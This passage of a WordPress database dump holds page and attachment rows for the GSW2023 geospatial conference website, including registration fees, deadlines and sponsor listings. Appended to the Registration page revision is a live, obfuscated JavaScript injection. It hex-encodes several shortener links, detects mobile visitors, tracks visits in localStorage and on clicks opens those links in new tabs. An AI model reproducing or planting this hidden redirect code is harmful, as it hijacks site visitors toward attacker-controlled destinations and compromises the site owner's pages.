(4030,1,'2023-04-02 07:08:41','2023-04-02 07:08:41','','dr sherif','','inherit','open','closed','','dr-sherif','','','2023-04-02 07:08:41','2023-04-02 07:08:41','',4029,'https://gsw2023.com/wp-content/uploads/2023/04/dr-sherif.jpg',0,'attachment','image/jpeg',0),
(4031,1,'2023-04-02 07:14:00','2023-04-02 07:14:00','','dr-ayman','','inherit','open','closed','','dr-ayman','','','2023-04-02 07:14:00','2023-04-02 07:14:00','',3954,'https://gsw2023.com/wp-content/uploads/2023/03/dr-ayman.jpg',0,'attachment','image/jpeg',0),
(4032,1,'2023-04-04 04:04:46','2023-04-04 04:04:46','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt;\"><strong>THE REGISTRATION FORM IS NOW OPEN IN CONFTOOL:<a href=\"https://www.conftool.com/gsw2023/\">REGISTER NOW</a></strong></span></p>\n<p>&nbsp;[/bsf-info-box][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt; font-family: Arial, Helvetica, sans-serif;\">The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</span></p>\n<p>&nbsp;[/bsf-info-box][ultimate_info_table color_scheme=\"gray\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\" heading_font_style=\"font-weight:bold;\"]&nbsp;</p>\n<table>\n<tbody>\n<tr>\n<td rowspan=\"2\"></td>\n<td colspan=\"3\">\n<h5><strong>Standard</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Student/Senior</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Accompanying person</strong></h5>\n</td>\n</tr>\n<tr>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n</tr>\n<tr>\n<td>\n<h6>1<strong> Day</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>2 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong> $200</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>3 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $450</strong></h6>\n</td>\n<td>\n<h6><strong>$500</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>4 Days</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong>$600</strong></h6>\n</td>\n<td>\n<h6><strong>$650</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>5 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $650</strong></h6>\n</td>\n<td>\n<h6><strong>$700</strong></h6>\n</td>\n<td>\n<h6><strong>$750</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$225</strong></h6>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][bsf-info-box icon_size=\"32\" title_font=\"font_family:Raleway|font_call:Raleway\"]<span style=\"font-family: Arial, Helvetica, sans-serif; font-size: 14pt;\"><strong>Any Registration Allows A Participant To Present One Paper Accepted For Publication. A Participant Can Only Have One Registration!</strong></span>[/bsf-info-box][vc_separator style=\"shadow\" border_width=\"8\"][vc_column_text]<strong><span style=\"font-size: 14pt;\">Registration deadlines</span></strong></p>\n<ul>\n<li>\n<p style=\"font-weight: 400;\">Early bird registration deadline: June 1, 2023</p>\n</li>\n<li>\n<p style=\"font-weight: 400;\">Late registration deadline: July 15, 2023</p>\n</li>\n</ul>\n<p><strong> </strong></p>\n<p><span style=\"font-size: 14pt;\"><strong>Important Notes:</strong></span></p>\n<ul>\n<li>Sc and M.Sc students are considered undergraduate university students or just graduated (3 months) and should upload a valid evidence of their student status when registering in ConfTool. PhD students should be max 30 years old and should provide valid evidence of their student status when registering in ConfTool.</li>\n<li>Seniors are considered participants over 65 years old September 2, 2023 and can show a valid ID on arrival.</li>\n<li>Any Registration allows a participant to present one paper accepted for publication. A participant can only have one registration!</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Registration Benefits</strong></span></p>\n<ul>\n<li><strong>Standard and student / senior (over 65) registration fees include:</strong></li>\n<li>Entry to all sessions/workshops;</li>\n<li>Entry to the Exhibition;</li>\n<li>Copy of Final Programme;</li>\n<li>Morning and Afternoon Tea/Coffee breaks;</li>\n<li>Lunches;</li>\n<li>Attendance at Welcome Reception (September 2, 2023);</li>\n<li>Attendance at Exhibitors Reception;</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li><span style=\"font-size: 14pt;\"><strong>Accompanying person fee includes:</strong></span></li>\n<li>Entry to Opening Session;</li>\n<li>Attendance at Welcome Reception;</li>\n<li>Attendance at Exhibitors Reception;</li>\n<li>Morning and Afternoon Tea/Coffee breaks;</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Cancellation policy:</strong></span></p>\n<ul>\n<li>Cancellations are accepted by e-mail to the secretariat of GSW2023 The registration fee will be refunded for 80% for cancellations received no later than August 2, 2023. No refunds after this date, but replacement is allowed.</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Two social dinners will be organized on Sep. 3<sup>rd</sup> and Sep. 5<sup>th</sup></strong></span></p>\n<h5 style=\"text-align: justify; color: red;\"></h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','2638-revision-v1','','','2023-04-04 04:04:46','2023-04-04 04:04:46','',2638,'https://gsw2023.com/?p=4032',0,'revision','',0),
(4033,1,'2023-04-06 22:25:06','2023-04-06 22:25:06','','Xiang Cheng electronic Logo','','inherit','open','closed','','xiang-cheng-electronic-logo','','','2023-04-06 22:25:06','2023-04-06 22:25:06','',3066,'https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo.png',0,'attachment','image/png',0),
(4034,1,'2023-04-06 22:28:30','2023-04-06 22:28:30','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400393668{margin-top: 125px !important;}\"]</p>\n<h6><img class=\"aligncenter wp-image-3987 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400301732{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><img class=\"aligncenter wp-image-3989 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680403737829{margin-top: 130px !important;}\"]<img class=\"aligncenter wp-image-3988 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680820057722{margin-top: 90px !important;}\"]<img class=\"alignnone size-medium wp-image-4033 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400702580{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><img class=\"alignnone size-medium wp-image-3997 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400628059{margin-top: 95px !important;}\"][/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in 